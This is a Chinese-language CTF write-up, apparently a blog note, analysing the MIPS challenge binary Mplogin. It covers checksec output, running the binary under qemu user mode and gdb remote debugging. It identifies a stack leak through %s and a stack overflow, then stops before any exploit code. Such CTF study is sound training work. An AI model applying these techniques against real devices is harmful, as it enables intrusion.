整理一下mips

工具

mipsrop

题目

Mplogin

1
2
3
4
5
6
7
8
9
10
11
$file Mplogin 
Mplogin: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped

$checksec Mplogin
[*] '/home/wendy/Desktop/mips/Mplogin/Mplogin'
    Arch:     mips-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

使用qemu的user模式mipsel(小端)运行

1
2
3
4
5
6
7
8
$tree -N -L 2
.
├── lib
│   ├── ld-uClibc.so.0
│   └── libc.so.0
└── Mplogin

1 directory, 3 files

题目给了lib 直接-L ./ 加载当前目录的lib库

1
2
3
4
$qemu-mipsel -L ./ Mplogin 
-----we1c0me t0 MP l0g1n s7stem-----
Username :

ida分析一下

sub_400840函数,再次打印时使用%s可以打印出栈信息

sub_400978函数,可以栈溢出

1
2
3
4
$qemu-mipsel -g 1237 -L ./ Mplogin 
-----we1c0me t0 MP l0g1n s7stem-----
Username : adminbbbb

1
2
3
4
5
6
7
8
9
10
$gdb-multiarch 
pwndbg> ls
lib  Mplogin
pwndbg> file Mplogin 
Reading symbols from Mplogin...
(No debugging symbols found in Mplogin)
pwndbg> set architecture mips
The target architecture is assumed to be mips
pwndbg> target remote :1237
pwndbg> b *0x00400920

image-20210909151721939